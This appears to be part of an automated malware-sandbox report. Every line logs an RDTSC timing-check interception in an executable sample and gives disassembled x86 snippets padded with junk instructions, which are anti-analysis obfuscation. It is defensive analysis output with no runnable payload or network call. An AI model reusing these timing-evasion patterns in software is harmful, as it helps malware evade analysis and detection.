                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 470B29 second address: 470B36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B80051 second address: 4B8007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5EEh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B8007E second address: 4B800B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A94CD4081h 0x00000008 call 00007F3A94CD4080h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A94CD407Ch 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B800B5 second address: 4B800BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B800BB second address: 4B800E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, 27BAh 0x0000000f mov esi, edx 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3A94CD4088h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC00DB second address: 4BC00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC00E1 second address: 4BC0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3A94CD4087h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B500F5 second address: 4B500F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B500F9 second address: 4B500FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B500FF second address: 4B50170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov edx, 54565454h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F3A9502B5F3h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov al, D9h 0x00000018 movsx ebx, si 0x0000001b popad 0x0000001c push dword ptr [ebp+04h] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F3A9502B5F6h 0x00000026 sub ecx, 1D121A68h 0x0000002c jmp 00007F3A9502B5EBh 0x00000031 popfd 0x00000032 mov di, ax 0x00000035 popad 0x00000036 push dword ptr [ebp+0Ch] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F3A9502B5F1h 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70DB8 second address: 4B70DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B706F5 second address: 4B706FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B706FB second address: 4B7070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B7070A second address: 4B7070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B7070E second address: 4B7073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3A94CD4081h 0x00000011 call 00007F3A94CD4080h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B7073D second address: 4B70758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70758 second address: 4B7077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3A94CD4085h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B7077D second address: 4B70784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70784 second address: 4B707C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A94CD407Dh 0x00000013 sub cx, 4F36h 0x00000018 jmp 00007F3A94CD4081h 0x0000001d popfd 0x0000001e mov bh, al 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B705C1 second address: 4B705DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B705DE second address: 4B70613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3A94CD407Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A94CD407Eh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70613 second address: 4B70625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5EEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70625 second address: 4B70629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70629 second address: 4B7064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F9h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B7064F second address: 4B70653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70653 second address: 4B70659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70659 second address: 4B70671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70671 second address: 4B70675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70675 second address: 4B70692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70692 second address: 4B70698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70698 second address: 4B706B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3A94CD407Ch 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B803A0 second address: 4B803CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5ECh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B803CC second address: 4B803D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC0010 second address: 4BC0016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC0016 second address: 4BC001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC001A second address: 4BC001E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC001E second address: 4BC0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A94CD4086h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC0046 second address: 4BC004A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC004A second address: 4BC0050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BC0050 second address: 4BC0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90545 second address: 4B90558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90558 second address: 4B90583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 call 00007F3A9502B5EBh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A9502B5F1h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90583 second address: 4B90598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90598 second address: 4B905A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5ECh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B905A8 second address: 4B905AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70543 second address: 4B70549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B70549 second address: 4B7054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B900CA second address: 4B900E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B900E2 second address: 4B9010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3A94CD4084h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B9010A second address: 4B90111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90111 second address: 4B90143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F3A94CD4089h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3A94CD407Dh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90143 second address: 4B9014A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B9014A second address: 4B9015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ax, FD77h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B9015B second address: 4B90160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90160 second address: 4B90166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90166 second address: 4B9016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B9016A second address: 4B9016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B9030C second address: 4B9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B9031B second address: 4B90325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 73D8DE6Eh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90325 second address: 4B90388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 jmp 00007F3A9502B5EEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F3A9502B5F0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3A9502B5EDh 0x00000021 sub ch, 00000056h 0x00000024 jmp 00007F3A9502B5F1h 0x00000029 popfd 0x0000002a jmp 00007F3A9502B5F0h 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B90388 second address: 4B9038E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B9038E second address: 4B90392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB06DB second address: 4BB06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f mov ax, 28E5h 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB06F7 second address: 4BB06FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB06FD second address: 4BB0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0701 second address: 4BB070D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB070D second address: 4BB073B instructions: 0x00000000 rdtsc 0x00000002 mov si, BF37h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov cl, 17h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov bl, 40h 0x00000010 jmp 00007F3A94CD407Eh 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 3AD1E570h 0x0000001f mov ebx, 5FC7E89Ch 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB073B second address: 4BB0741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0741 second address: 4BB0763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A94CD4085h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0763 second address: 4BB0778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0778 second address: 4BB077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB077E second address: 4BB07CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov ebx, 7F686748h 0x0000000f jmp 00007F3A9502B5F1h 0x00000014 popad 0x00000015 mov eax, dword ptr [774365FCh] 0x0000001a jmp 00007F3A9502B5EEh 0x0000001f test eax, eax 0x00000021 pushad 0x00000022 mov si, C3FDh 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 je 00007F3B0782E790h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A9502B5EBh 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB07CF second address: 4BB0833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A94CD407Fh 0x00000009 xor ch, FFFFFF9Eh 0x0000000c jmp 00007F3A94CD4089h 0x00000011 popfd 0x00000012 call 00007F3A94CD4080h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, eax 0x0000001d pushad 0x0000001e mov di, 6162h 0x00000022 mov ecx, edi 0x00000024 popad 0x00000025 xor eax, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F3A94CD4081h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0833 second address: 4BB087D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 adc esi, 0C4867BEh 0x0000000f jmp 00007F3A9502B5F9h 0x00000014 popfd 0x00000015 mov ax, 3107h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c and ecx, 1Fh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB087D second address: 4BB0881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0881 second address: 4BB08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 2Eh 0x00000008 popad 0x00000009 ror eax, cl 0x0000000b jmp 00007F3A9502B5EDh 0x00000010 leave 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5ECh 0x00000018 and ax, 5B18h 0x0000001d jmp 00007F3A9502B5EBh 0x00000022 popfd 0x00000023 call 00007F3A9502B5F8h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0957 second address: 4BB0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0973 second address: 4BB0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB0977 second address: 4BB097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB097D second address: 4BB09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4227h 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F3A9502B5F9h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, 081Eh 0x0000001a mov dx, 882Ah 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4BB09B0 second address: 4BB09CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4087h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60016 second address: 4B6001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
